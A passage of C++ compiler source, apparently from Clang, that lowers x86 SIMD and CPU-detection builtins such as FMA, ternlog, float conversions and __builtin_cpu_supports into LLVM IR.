case clang::X86::BI__builtin_ia32_vfmaddph512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddps512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddpd512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddsubph512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddsubps512_maskz:
case clang::X86::BI__builtin_ia32_vfmaddsubpd512_maskz:
MaskFalseVal = Constant::getNullValue(Ops[0]->getType());
break;
case clang::X86::BI__builtin_ia32_vfmsubph512_mask3:
case clang::X86::BI__builtin_ia32_vfmaddph512_mask3:
case clang::X86::BI__builtin_ia32_vfmsubps512_mask3:
case clang::X86::BI__builtin_ia32_vfmaddps512_mask3:
case clang::X86::BI__builtin_ia32_vfmsubpd512_mask3:
case clang::X86::BI__builtin_ia32_vfmaddpd512_mask3:
case clang::X86::BI__builtin_ia32_vfmsubaddph512_mask3:
case clang::X86::BI__builtin_ia32_vfmaddsubph512_mask3:
case clang::X86::BI__builtin_ia32_vfmsubaddps512_mask3:
case clang::X86::BI__builtin_ia32_vfmaddsubps512_mask3:
case clang::X86::BI__builtin_ia32_vfmsubaddpd512_mask3:
case clang::X86::BI__builtin_ia32_vfmaddsubpd512_mask3:
MaskFalseVal = Ops[2];
break;
}
if (MaskFalseVal)
return EmitX86Select(CGF, Ops[3], Res, MaskFalseVal);
return Res;
}
static Value *EmitScalarFMAExpr(CodeGenFunction &CGF, const CallExpr *E,
MutableArrayRef<Value *> Ops, Value *Upper,
bool ZeroMask = false, unsigned PTIdx = 0,
bool NegAcc = false) {
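// Upper supplies the vector whose upper elements pass through to the result;
// PTIdx selects the operand used as the masked pass-through value, and
// NegAcc negates the accumulator to form the fmsub variants.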
unsigned Rnd = 4;
if (Ops.size() > 4)
Rnd = cast<llvm::ConstantInt>(Ops[4])->getZExtValue();
if (NegAcc)
Ops[2] = CGF.Builder.CreateFNeg(Ops[2]);
Ops[0] = CGF.Builder.CreateExtractElement(Ops[0], (uint64_t)0);
Ops[1] = CGF.Builder.CreateExtractElement(Ops[1], (uint64_t)0);
Ops[2] = CGF.Builder.CreateExtractElement(Ops[2], (uint64_t)0);
Value *Res;
if (Rnd != 4) {
Intrinsic::ID IID;
switch (Ops[0]->getType()->getPrimitiveSizeInBits()) {
case 16:
IID = Intrinsic::x86_avx512fp16_vfmadd_f16;
break;
case 32:
IID = Intrinsic::x86_avx512_vfmadd_f32;
break;
case 64:
IID = Intrinsic::x86_avx512_vfmadd_f64;
break;
default:
llvm_unreachable("Unexpected size");
}
Res = CGF.Builder.CreateCall(CGF.CGM.getIntrinsic(IID),
{Ops[0], Ops[1], Ops[2], Ops[4]});
} else if (CGF.Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(CGF, E);
Function *FMA = CGF.CGM.getIntrinsic(
Intrinsic::experimental_constrained_fma, Ops[0]->getType());
Res = CGF.Builder.CreateConstrainedFPCall(FMA, Ops.slice(0, 3));
} else {
Function *FMA = CGF.CGM.getIntrinsic(Intrinsic::fma, Ops[0]->getType());
Res = CGF.Builder.CreateCall(FMA, Ops.slice(0, 3));
}
// If we have more than 3 arguments, we need to do masking.
if (Ops.size() > 3) {
Value *PassThru = ZeroMask ? Constant::getNullValue(Res->getType())
: Ops[PTIdx];
// If we negated the accumulator and it is also the PassThru value, we need
// to bypass the negate. Conveniently, Upper should be the same value in
// this case.
if (NegAcc && PTIdx == 2)
PassThru = CGF.Builder.CreateExtractElement(Upper, (uint64_t)0);
Res = EmitX86ScalarSelect(CGF, Ops[3], Res, PassThru);
}
return CGF.Builder.CreateInsertElement(Upper, Res, (uint64_t)0);
}
static Value *EmitX86Muldq(CodeGenFunction &CGF, bool IsSigned,
ArrayRef<Value *> Ops) {
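// pmuldq/pmuludq multiply the even-numbered 32-bit elements into full 64-bit
// products; model this as a vXi64 multiply after sign- or zero-extending the
// low 32 bits of each 64-bit lane.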
llvm::Type *Ty = Ops[0]->getType();
// Arguments have a vXi32 type so cast to vXi64.
Ty = llvm::FixedVectorType::get(CGF.Int64Ty,
Ty->getPrimitiveSizeInBits() / 64);
Value *LHS = CGF.Builder.CreateBitCast(Ops[0], Ty);
Value *RHS = CGF.Builder.CreateBitCast(Ops[1], Ty);
if (IsSigned) {
// Shift left then arithmetic shift right.
Constant *ShiftAmt = ConstantInt::get(Ty, 32);
LHS = CGF.Builder.CreateShl(LHS, ShiftAmt);
LHS = CGF.Builder.CreateAShr(LHS, ShiftAmt);
RHS = CGF.Builder.CreateShl(RHS, ShiftAmt);
RHS = CGF.Builder.CreateAShr(RHS, ShiftAmt);
} else {
// Clear the upper bits.
Constant *Mask = ConstantInt::get(Ty, 0xffffffff);
LHS = CGF.Builder.CreateAnd(LHS, Mask);
RHS = CGF.Builder.CreateAnd(RHS, Mask);
}
return CGF.Builder.CreateMul(LHS, RHS);
}
// Emit a masked pternlog intrinsic. This only exists because the header has
// to use a macro, and we aren't able to pass the input argument to both a
// pternlog builtin and a select builtin without evaluating it twice.
static Value *EmitX86Ternlog(CodeGenFunction &CGF, bool ZeroMask,
ArrayRef<Value *> Ops) {
llvm::Type *Ty = Ops[0]->getType();
unsigned VecWidth = Ty->getPrimitiveSizeInBits();
unsigned EltWidth = Ty->getScalarSizeInBits();
Intrinsic::ID IID;
if (VecWidth == 128 && EltWidth == 32)
IID = Intrinsic::x86_avx512_pternlog_d_128;
else if (VecWidth == 256 && EltWidth == 32)
IID = Intrinsic::x86_avx512_pternlog_d_256;
else if (VecWidth == 512 && EltWidth == 32)
IID = Intrinsic::x86_avx512_pternlog_d_512;
else if (VecWidth == 128 && EltWidth == 64)
IID = Intrinsic::x86_avx512_pternlog_q_128;
else if (VecWidth == 256 && EltWidth == 64)
IID = Intrinsic::x86_avx512_pternlog_q_256;
else if (VecWidth == 512 && EltWidth == 64)
IID = Intrinsic::x86_avx512_pternlog_q_512;
else
llvm_unreachable("Unexpected intrinsic");
Value *Ternlog = CGF.Builder.CreateCall(CGF.CGM.getIntrinsic(IID),
Ops.drop_back());
Value *PassThru = ZeroMask ? ConstantAggregateZero::get(Ty) : Ops[0];
return EmitX86Select(CGF, Ops[4], Ternlog, PassThru);
}
static Value *EmitX86SExtMask(CodeGenFunction &CGF, Value *Op,
llvm::Type *DstTy) {
unsigned NumberOfElements =
cast<llvm::FixedVectorType>(DstTy)->getNumElements();
Value *Mask = getMaskVecValue(CGF, Op, NumberOfElements);
return CGF.Builder.CreateSExt(Mask, DstTy, "vpmovm2");
}
// Emit binary intrinsic with the same type used in result/args.
static Value *EmitX86BinaryIntrinsic(CodeGenFunction &CGF,
ArrayRef<Value *> Ops, Intrinsic::ID IID) {
llvm::Function *F = CGF.CGM.getIntrinsic(IID, Ops[0]->getType());
return CGF.Builder.CreateCall(F, {Ops[0], Ops[1]});
}
Value *CodeGenFunction::EmitX86CpuIs(const CallExpr *E) {
const Expr *CPUExpr = E->getArg(0)->IgnoreParenCasts();
StringRef CPUStr = cast<clang::StringLiteral>(CPUExpr)->getString();
return EmitX86CpuIs(CPUStr);
}
// Convert F16 halves to floats.
static Value *EmitX86CvtF16ToFloatExpr(CodeGenFunction &CGF,
ArrayRef<Value *> Ops,
llvm::Type *DstTy) {
assert((Ops.size() == 1 || Ops.size() == 3 || Ops.size() == 4) &&
"Unknown cvtph2ps intrinsic");
// If the SAE intrinsic doesn't use default rounding, we can't lower it to
// generic IR; call the masked target intrinsic directly.
if (Ops.size() == 4 && cast<llvm::ConstantInt>(Ops[3])->getZExtValue() != 4) {
Function *F =
CGF.CGM.getIntrinsic(Intrinsic::x86_avx512_mask_vcvtph2ps_512);
return CGF.Builder.CreateCall(F, {Ops[0], Ops[1], Ops[2], Ops[3]});
}
unsigned NumDstElts = cast<llvm::FixedVectorType>(DstTy)->getNumElements();
Value *Src = Ops[0];
// Extract the subvector.
if (NumDstElts !=
cast<llvm::FixedVectorType>(Src->getType())->getNumElements()) {
assert(NumDstElts == 4 && "Unexpected vector size");
Src = CGF.Builder.CreateShuffleVector(Src, ArrayRef<int>{0, 1, 2, 3});
}
// Bitcast from vXi16 to vXf16.
auto *HalfTy = llvm::FixedVectorType::get(
llvm::Type::getHalfTy(CGF.getLLVMContext()), NumDstElts);
Src = CGF.Builder.CreateBitCast(Src, HalfTy);
// Perform the fp-extension.
Value *Res = CGF.Builder.CreateFPExt(Src, DstTy, "cvtph2ps");
if (Ops.size() >= 3)
Res = EmitX86Select(CGF, Ops[2], Res, Ops[1]);
return Res;
}
// Convert a BF16 to a float.
static Value *EmitX86CvtBF16ToFloatExpr(CodeGenFunction &CGF,
const CallExpr *E,
ArrayRef<Value *> Ops) {
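// A bfloat16 value is the high 16 bits of an IEEE-754 binary32, so the
// widening conversion is exact: zero-extend, shift left by 16, and bitcast
// to float.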
llvm::Type *Int32Ty = CGF.Builder.getInt32Ty();
Value *ZeroExt = CGF.Builder.CreateZExt(Ops[0], Int32Ty);
Value *Shl = CGF.Builder.CreateShl(ZeroExt, 16);
llvm::Type *ResultType = CGF.ConvertType(E->getType());
Value *BitCast = CGF.Builder.CreateBitCast(Shl, ResultType);
return BitCast;
}
Value *CodeGenFunction::EmitX86CpuIs(StringRef CPUStr) {
llvm::Type *Int32Ty = Builder.getInt32Ty();
// Matching the struct layout from the compiler-rt/libgcc structure that is
// filled in:
// unsigned int __cpu_vendor;
// unsigned int __cpu_type;
// unsigned int __cpu_subtype;
// unsigned int __cpu_features[1];
llvm::Type *STy = llvm::StructType::get(Int32Ty, Int32Ty, Int32Ty,
llvm::ArrayType::get(Int32Ty, 1));
// Grab the global __cpu_model.
llvm::Constant *CpuModel = CGM.CreateRuntimeVariable(STy, "__cpu_model");
cast<llvm::GlobalValue>(CpuModel)->setDSOLocal(true);
// Calculate the index needed to access the correct field based on the
// range. Also adjust the expected value.
unsigned Index;
unsigned Value;
std::tie(Index, Value) = StringSwitch<std::pair<unsigned, unsigned>>(CPUStr)
#define X86_VENDOR(ENUM, STRING) \
.Case(STRING, {0u, static_cast<unsigned>(llvm::X86::ENUM)})
#define X86_CPU_TYPE_ALIAS(ENUM, ALIAS) \
.Case(ALIAS, {1u, static_cast<unsigned>(llvm::X86::ENUM)})
#define X86_CPU_TYPE(ENUM, STR) \
.Case(STR, {1u, static_cast<unsigned>(llvm::X86::ENUM)})
#define X86_CPU_SUBTYPE(ENUM, STR) \
.Case(STR, {2u, static_cast<unsigned>(llvm::X86::ENUM)})
#include "llvm/Support/X86TargetParser.def"
.Default({0, 0});
assert(Value != 0 && "Invalid CPUStr passed to CpuIs");
// Grab the appropriate field from __cpu_model.
llvm::Value *Idxs[] = {ConstantInt::get(Int32Ty, 0),
ConstantInt::get(Int32Ty, Index)};
llvm::Value *CpuValue = Builder.CreateGEP(STy, CpuModel, Idxs);
CpuValue = Builder.CreateAlignedLoad(Int32Ty, CpuValue,
CharUnits::fromQuantity(4));
// Check the value of the field against the requested value.
return Builder.CreateICmpEQ(CpuValue,
llvm::ConstantInt::get(Int32Ty, Value));
}
Value *CodeGenFunction::EmitX86CpuSupports(const CallExpr *E) {
const Expr *FeatureExpr = E->getArg(0)->IgnoreParenCasts();
StringRef FeatureStr = cast<StringLiteral>(FeatureExpr)->getString();
return EmitX86CpuSupports(FeatureStr);
}
Value *CodeGenFunction::EmitX86CpuSupports(ArrayRef<StringRef> FeatureStrs) {
return EmitX86CpuSupports(llvm::X86::getCpuSupportsMask(FeatureStrs));
}
llvm::Value *CodeGenFunction::EmitX86CpuSupports(uint64_t FeaturesMask) {
uint32_t Features1 = Lo_32(FeaturesMask);
uint32_t Features2 = Hi_32(FeaturesMask);
Value *Result = Builder.getTrue();
if (Features1 != 0) {
// Matching the struct layout from the compiler-rt/libgcc structure that is
// filled in:
// unsigned int __cpu_vendor;
// unsigned int __cpu_type;
// unsigned int __cpu_subtype;
// unsigned int __cpu_features[1];
llvm::Type *STy = llvm::StructType::get(Int32Ty, Int32Ty, Int32Ty,
llvm::ArrayType::get(Int32Ty, 1));
// Grab the global __cpu_model.
llvm::Constant *CpuModel = CGM.CreateRuntimeVariable(STy, "__cpu_model");
cast<llvm::GlobalValue>(CpuModel)->setDSOLocal(true);
// Grab the first (0th) element of the __cpu_features field of the global
// struct STy.
Value *Idxs[] = {Builder.getInt32(0), Builder.getInt32(3),
Builder.getInt32(0)};
Value *CpuFeatures = Builder.CreateGEP(STy, CpuModel, Idxs);
Value *Features = Builder.CreateAlignedLoad(Int32Ty, CpuFeatures,
CharUnits::fromQuantity(4));
// Check the value of the bit corresponding to the feature requested.
Value *Mask = Builder.getInt32(Features1);
Value *Bitset = Builder.CreateAnd(Features, Mask);
Value *Cmp = Builder.CreateICmpEQ(Bitset, Mask);
Result = Builder.CreateAnd(Result, Cmp);
}
if (Features2 != 0) {
llvm::Constant *CpuFeatures2 = CGM.CreateRuntimeVariable(Int32Ty,
"__cpu_features2");
cast<llvm::GlobalValue>(CpuFeatures2)->setDSOLocal(true);
Value *Features = Builder.CreateAlignedLoad(Int32Ty, CpuFeatures2,
CharUnits::fromQuantity(4));
// Check the value of the bit corresponding to the feature requested.
Value *Mask = Builder.getInt32(Features2);
Value *Bitset = Builder.CreateAnd(Features, Mask);
Value *Cmp = Builder.CreateICmpEQ(Bitset, Mask);
Result = Builder.CreateAnd(Result, Cmp);
}
return Result;
}
Value *CodeGenFunction::EmitX86CpuInit() {
llvm::FunctionType *FTy = llvm::FunctionType::get(VoidTy,
/*Variadic*/ false);
llvm::FunctionCallee Func =
CGM.CreateRuntimeFunction(FTy, "__cpu_indicator_init");
cast<llvm::GlobalValue>(Func.getCallee())->setDSOLocal(true);
cast<llvm::GlobalValue>(Func.getCallee())
->setDLLStorageClass(llvm::GlobalValue::DefaultStorageClass);
return Builder.CreateCall(Func);
}
Value *CodeGenFunction::EmitX86BuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
if (BuiltinID == X86::BI__builtin_cpu_is)
return EmitX86CpuIs(E);
if (BuiltinID == X86::BI__builtin_cpu_supports)
return EmitX86CpuSupports(E);
if (BuiltinID == X86::BI__builtin_cpu_init)
return EmitX86CpuInit();
// Handle MSVC intrinsics before argument evaluation to prevent double
// evaluation.
if (Optional<MSVCIntrin> MsvcIntId = translateX86ToMsvcIntrin(BuiltinID))
return EmitMSVCBuiltinExpr(*MsvcIntId, E);
SmallVector<Value*, 4> Ops;
bool IsMaskFCmp = false;
bool IsConjFMA = false;
// Find out if any arguments are required to be integer constant expressions.
unsigned ICEArguments = 0;
ASTContext::GetBuiltinTypeError Error;
getContext().GetBuiltinType(BuiltinID, Error, &ICEArguments);
assert(Error == ASTContext::GE_None && "Should not codegen an error");
for (unsigned i = 0, e = E->getNumArgs(); i != e; i++) {
// If this is a normal argument, just emit it as a scalar.
if ((ICEArguments & (1 << i)) == 0) {
Ops.push_back(EmitScalarExpr(E->getArg(i)));
continue;
}
// If this is required to be a constant, constant fold it so that we know
// that the generated intrinsic gets a ConstantInt.
Ops.push_back(llvm::ConstantInt::get(
getLLVMContext(), *E->getArg(i)->getIntegerConstantExpr(getContext())));
}
// These exist so that the builtin that takes an immediate can be bounds
// checked by clang to avoid passing bad immediates to the backend. Since
// AVX has a larger immediate than SSE we would need separate builtins to
// do the different bounds checking. Rather than create a clang-specific
// SSE-only builtin, this implements eight separate builtins to match the
// gcc implementation.
auto getCmpIntrinsicCall = [this, &Ops](Intrinsic::ID ID, unsigned Imm) {
Ops.push_back(llvm::ConstantInt::get(Int8Ty, Imm));
llvm::Function *F = CGM.getIntrinsic(ID);
return Builder.CreateCall(F, Ops);
};
// For the vector forms of FP comparisons, translate the builtins directly to
// IR.
// TODO: The builtins could be removed if the SSE header files used vector
// extension comparisons directly (vector ordered/unordered may need
// additional support via __builtin_isnan()).
auto getVectorFCmpIR = [this, &Ops, E](CmpInst::Predicate Pred,
bool IsSignaling) {
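// The compare yields <N x i1>; sign-extend to the integer vector of the same
// width so each lane becomes all-ones or all-zeros, then bitcast back to the
// FP vector type.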
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
Value *Cmp;
if (IsSignaling)
Cmp = Builder.CreateFCmpS(Pred, Ops[0], Ops[1]);
else
Cmp = Builder.CreateFCmp(Pred, Ops[0], Ops[1]);
llvm::VectorType *FPVecTy = cast<llvm::VectorType>(Ops[0]->getType());
llvm::VectorType *IntVecTy = llvm::VectorType::getInteger(FPVecTy);
Value *Sext = Builder.CreateSExt(Cmp, IntVecTy);
return Builder.CreateBitCast(Sext, FPVecTy);
};
switch (BuiltinID) {
default: return nullptr;
case X86::BI_mm_prefetch: {
Value *Address = Ops[0];
ConstantInt *C = cast<ConstantInt>(Ops[1]);
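// The _MM_HINT constant packs the access intent in bit 2 (0 = read,
// 1 = write) and the temporal locality level in bits 1:0.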
Value *RW = ConstantInt::get(Int32Ty, (C->getZExtValue() >> 2) & 0x1);
Value *Locality = ConstantInt::get(Int32Ty, C->getZExtValue() & 0x3);
Value *Data = ConstantInt::get(Int32Ty, 1);
Function *F = CGM.getIntrinsic(Intrinsic::prefetch, Address->getType());
return Builder.CreateCall(F, {Address, RW, Locality, Data});
}
case X86::BI_mm_clflush: {
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse2_clflush),
Ops[0]);
}
case X86::BI_mm_lfence: {
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse2_lfence));
}
case X86::BI_mm_mfence: {
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse2_mfence));
}
case X86::BI_mm_sfence: {
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse_sfence));
}
case X86::BI_mm_pause: {
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse2_pause));
}
case X86::BI__rdtsc: {
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_rdtsc));
}
case X86::BI__builtin_ia32_rdtscp: {
Value *Call = Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_rdtscp));
Builder.CreateDefaultAlignedStore(Builder.CreateExtractValue(Call, 1),
Ops[0]);
return Builder.CreateExtractValue(Call, 0);
}
case X86::BI__builtin_ia32_lzcnt_u16:
case X86::BI__builtin_ia32_lzcnt_u32:
case X86::BI__builtin_ia32_lzcnt_u64: {
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0], Builder.getInt1(false)});
}
case X86::BI__builtin_ia32_tzcnt_u16:
case X86::BI__builtin_ia32_tzcnt_u32:
case X86::BI__builtin_ia32_tzcnt_u64: {
Function *F = CGM.getIntrinsic(Intrinsic::cttz, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0], Builder.getInt1(false)});
}
case X86::BI__builtin_ia32_undef128:
case X86::BI__builtin_ia32_undef256:
case X86::BI__builtin_ia32_undef512:
// The x86 definition of "undef" is not the same as the LLVM definition
// (PR32176). We leave optimizing away an unnecessary zero constant to the
// IR optimizer and backend.
// TODO: If we had a "freeze" IR instruction to generate a fixed undef
// value, we should use that here instead of a zero.
return llvm::Constant::getNullValue(ConvertType(E->getType()));
case X86::BI__builtin_ia32_vec_init_v8qi:
case X86::BI__builtin_ia32_vec_init_v4hi:
case X86::BI__builtin_ia32_vec_init_v2si:
return Builder.CreateBitCast(BuildVector(Ops),
llvm::Type::getX86_MMXTy(getLLVMContext()));
case X86::BI__builtin_ia32_vec_ext_v2si:
case X86::BI__builtin_ia32_vec_ext_v16qi:
case X86::BI__builtin_ia32_vec_ext_v8hi:
case X86::BI__builtin_ia32_vec_ext_v4si:
case X86::BI__builtin_ia32_vec_ext_v4sf:
case X86::BI__builtin_ia32_vec_ext_v2di:
case X86::BI__builtin_ia32_vec_ext_v32qi:
case X86::BI__builtin_ia32_vec_ext_v16hi:
case X86::BI__builtin_ia32_vec_ext_v8si:
case X86::BI__builtin_ia32_vec_ext_v4di: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
uint64_t Index = cast<ConstantInt>(Ops[1])->getZExtValue();
Index &= NumElts - 1;
// These builtins exist so we can ensure the index is an ICE and in range.
// Otherwise we could just do this in the header file.
return Builder.CreateExtractElement(Ops[0], Index);
}
case X86::BI__builtin_ia32_vec_set_v16qi:
case X86::BI__builtin_ia32_vec_set_v8hi:
case X86::BI__builtin_ia32_vec_set_v4si:
case X86::BI__builtin_ia32_vec_set_v2di:
case X86::BI__builtin_ia32_vec_set_v32qi:
case X86::BI__builtin_ia32_vec_set_v16hi:
case X86::BI__builtin_ia32_vec_set_v8si:
case X86::BI__builtin_ia32_vec_set_v4di: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
unsigned Index = cast<ConstantInt>(Ops[2])->getZExtValue();
Index &= NumElts - 1;
// These builtins exist so we can ensure the index is an ICE and in range.
// Otherwise we could just do this in the header file.
return Builder.CreateInsertElement(Ops[0], Ops[1], Index);
}
case X86::BI_mm_setcsr:
case X86::BI__builtin_ia32_ldmxcsr: {
Address Tmp = CreateMemTemp(E->getArg(0)->getType());
Builder.CreateStore(Ops[0], Tmp);
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse_ldmxcsr),
Builder.CreateBitCast(Tmp.getPointer(), Int8PtrTy));
}
case X86::BI_mm_getcsr:
case X86::BI__builtin_ia32_stmxcsr: {
Address Tmp = CreateMemTemp(E->getType());
Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_sse_stmxcsr),
Builder.CreateBitCast(Tmp.getPointer(), Int8PtrTy));
return Builder.CreateLoad(Tmp, "stmxcsr");
}
case X86::BI__builtin_ia32_xsave:
case X86::BI__builtin_ia32_xsave64:
case X86::BI__builtin_ia32_xrstor:
case X86::BI__builtin_ia32_xrstor64:
case X86::BI__builtin_ia32_xsaveopt:
case X86::BI__builtin_ia32_xsaveopt64:
case X86::BI__builtin_ia32_xrstors:
case X86::BI__builtin_ia32_xrstors64:
case X86::BI__builtin_ia32_xsavec:
case X86::BI__builtin_ia32_xsavec64:
case X86::BI__builtin_ia32_xsaves:
case X86::BI__builtin_ia32_xsaves64:
case X86::BI__builtin_ia32_xsetbv:
case X86::BI_xsetbv: {
Intrinsic::ID ID;
#define INTRINSIC_X86_XSAVE_ID(NAME) \
case X86::BI__builtin_ia32_##NAME: \
ID = Intrinsic::x86_##NAME; \
break
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
INTRINSIC_X86_XSAVE_ID(xsave);
INTRINSIC_X86_XSAVE_ID(xsave64);
INTRINSIC_X86_XSAVE_ID(xrstor);
INTRINSIC_X86_XSAVE_ID(xrstor64);
INTRINSIC_X86_XSAVE_ID(xsaveopt);
INTRINSIC_X86_XSAVE_ID(xsaveopt64);
INTRINSIC_X86_XSAVE_ID(xrstors);
INTRINSIC_X86_XSAVE_ID(xrstors64);
INTRINSIC_X86_XSAVE_ID(xsavec);
INTRINSIC_X86_XSAVE_ID(xsavec64);
INTRINSIC_X86_XSAVE_ID(xsaves);
INTRINSIC_X86_XSAVE_ID(xsaves64);
INTRINSIC_X86_XSAVE_ID(xsetbv);
case X86::BI_xsetbv:
ID = Intrinsic::x86_xsetbv;
break;
}
#undef INTRINSIC_X86_XSAVE_ID
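// These intrinsics take the 64-bit feature mask split into two i32 halves,
// high half first, matching the EDX:EAX register pair used by the
// instructions.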
Value *Mhi = Builder.CreateTrunc(
Builder.CreateLShr(Ops[1], ConstantInt::get(Int64Ty, 32)), Int32Ty);
Value *Mlo = Builder.CreateTrunc(Ops[1], Int32Ty);
Ops[1] = Mhi;
Ops.push_back(Mlo);
return Builder.CreateCall(CGM.getIntrinsic(ID), Ops);
}
case X86::BI__builtin_ia32_xgetbv:
case X86::BI_xgetbv:
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::x86_xgetbv), Ops);
case X86::BI__builtin_ia32_storedqudi128_mask:
case X86::BI__builtin_ia32_storedqusi128_mask:
case X86::BI__builtin_ia32_storedquhi128_mask:
case X86::BI__builtin_ia32_storedquqi128_mask:
case X86::BI__builtin_ia32_storeupd128_mask:
case X86::BI__builtin_ia32_storeups128_mask:
case X86::BI__builtin_ia32_storedqudi256_mask:
case X86::BI__builtin_ia32_storedqusi256_mask:
case X86::BI__builtin_ia32_storedquhi256_mask:
case X86::BI__builtin_ia32_storedquqi256_mask:
case X86::BI__builtin_ia32_storeupd256_mask:
case X86::BI__builtin_ia32_storeups256_mask:
case X86::BI__builtin_ia32_storedqudi512_mask:
case X86::BI__builtin_ia32_storedqusi512_mask:
case X86::BI__builtin_ia32_storedquhi512_mask:
case X86::BI__builtin_ia32_storedquqi512_mask:
case X86::BI__builtin_ia32_storeupd512_mask:
case X86::BI__builtin_ia32_storeups512_mask:
return EmitX86MaskedStore(*this, Ops, Align(1));
case X86::BI__builtin_ia32_storesh128_mask:
case X86::BI__builtin_ia32_storess128_mask:
case X86::BI__builtin_ia32_storesd128_mask:
return EmitX86MaskedStore(*this, Ops, Align(1));
case X86::BI__builtin_ia32_vpopcntb_128:
case X86::BI__builtin_ia32_vpopcntd_128:
case X86::BI__builtin_ia32_vpopcntq_128:
case X86::BI__builtin_ia32_vpopcntw_128:
case X86::BI__builtin_ia32_vpopcntb_256:
case X86::BI__builtin_ia32_vpopcntd_256:
case X86::BI__builtin_ia32_vpopcntq_256:
case X86::BI__builtin_ia32_vpopcntw_256:
case X86::BI__builtin_ia32_vpopcntb_512:
case X86::BI__builtin_ia32_vpopcntd_512:
case X86::BI__builtin_ia32_vpopcntq_512:
case X86::BI__builtin_ia32_vpopcntw_512: {
llvm::Type *ResultType = ConvertType(E->getType());
llvm::Function *F = CGM.getIntrinsic(Intrinsic::ctpop, ResultType);
return Builder.CreateCall(F, Ops);
}
case X86::BI__builtin_ia32_cvtmask2b128:
case X86::BI__builtin_ia32_cvtmask2b256:
case X86::BI__builtin_ia32_cvtmask2b512:
case X86::BI__builtin_ia32_cvtmask2w128:
case X86::BI__builtin_ia32_cvtmask2w256:
case X86::BI__builtin_ia32_cvtmask2w512:
case X86::BI__builtin_ia32_cvtmask2d128:
case X86::BI__builtin_ia32_cvtmask2d256:
case X86::BI__builtin_ia32_cvtmask2d512:
case X86::BI__builtin_ia32_cvtmask2q128:
case X86::BI__builtin_ia32_cvtmask2q256:
case X86::BI__builtin_ia32_cvtmask2q512:
return EmitX86SExtMask(*this, Ops[0], ConvertType(E->getType()));
case X86::BI__builtin_ia32_cvtb2mask128:
case X86::BI__builtin_ia32_cvtb2mask256:
case X86::BI__builtin_ia32_cvtb2mask512:
case X86::BI__builtin_ia32_cvtw2mask128:
case X86::BI__builtin_ia32_cvtw2mask256:
case X86::BI__builtin_ia32_cvtw2mask512:
case X86::BI__builtin_ia32_cvtd2mask128:
case X86::BI__builtin_ia32_cvtd2mask256:
case X86::BI__builtin_ia32_cvtd2mask512:
case X86::BI__builtin_ia32_cvtq2mask128:
case X86::BI__builtin_ia32_cvtq2mask256:
case X86::BI__builtin_ia32_cvtq2mask512:
return EmitX86ConvertToMask(*this, Ops[0]);
case X86::BI__builtin_ia32_cvtdq2ps512_mask:
case X86::BI__builtin_ia32_cvtqq2ps512_mask:
case X86::BI__builtin_ia32_cvtqq2pd512_mask:
case X86::BI__builtin_ia32_vcvtw2ph512_mask:
case X86::BI__builtin_ia32_vcvtdq2ph512_mask:
case X86::BI__builtin_ia32_vcvtqq2ph512_mask:
return EmitX86ConvertIntToFp(*this, E, Ops, /*IsSigned*/ true);
case X86::BI__builtin_ia32_cvtudq2ps512_mask:
case X86::BI__builtin_ia32_cvtuqq2ps512_mask:
case X86::BI__builtin_ia32_cvtuqq2pd512_mask:
case X86::BI__builtin_ia32_vcvtuw2ph512_mask:
case X86::BI__builtin_ia32_vcvtudq2ph512_mask:
case X86::BI__builtin_ia32_vcvtuqq2ph512_mask:
return EmitX86ConvertIntToFp(*this, E, Ops, /*IsSigned*/ false);
case X86::BI__builtin_ia32_vfmaddss3:
case X86::BI__builtin_ia32_vfmaddsd3:
case X86::BI__builtin_ia32_vfmaddsh3_mask:
case X86::BI__builtin_ia32_vfmaddss3_mask:
case X86::BI__builtin_ia32_vfmaddsd3_mask:
return EmitScalarFMAExpr(*this, E, Ops, Ops[0]);
case X86::BI__builtin_ia32_vfmaddss:
case X86::BI__builtin_ia32_vfmaddsd:
return EmitScalarFMAExpr(*this, E, Ops,
Constant::getNullValue(Ops[0]->getType()));
case X86::BI__builtin_ia32_vfmaddsh3_maskz:
case X86::BI__builtin_ia32_vfmaddss3_maskz:
case X86::BI__builtin_ia32_vfmaddsd3_maskz:
return EmitScalarFMAExpr(*this, E, Ops, Ops[0], /*ZeroMask*/ true);
case X86::BI__builtin_ia32_vfmaddsh3_mask3:
case X86::BI__builtin_ia32_vfmaddss3_mask3:
case X86::BI__builtin_ia32_vfmaddsd3_mask3:
return EmitScalarFMAExpr(*this, E, Ops, Ops[2], /*ZeroMask*/ false, 2);
case X86::BI__builtin_ia32_vfmsubsh3_mask3:
case X86::BI__builtin_ia32_vfmsubss3_mask3:
case X86::BI__builtin_ia32_vfmsubsd3_mask3:
return EmitScalarFMAExpr(*this, E, Ops, Ops[2], /*ZeroMask*/ false, 2,
/*NegAcc*/ true);
case X86::BI__builtin_ia32_vfmaddph:
case X86::BI__builtin_ia32_vfmaddps:
case X86::BI__builtin_ia32_vfmaddpd:
case X86::BI__builtin_ia32_vfmaddph256:
case X86::BI__builtin_ia32_vfmaddps256:
case X86::BI__builtin_ia32_vfmaddpd256:
case X86::BI__builtin_ia32_vfmaddph512_mask:
case X86::BI__builtin_ia32_vfmaddph512_maskz:
case X86::BI__builtin_ia32_vfmaddph512_mask3:
case X86::BI__builtin_ia32_vfmaddps512_mask:
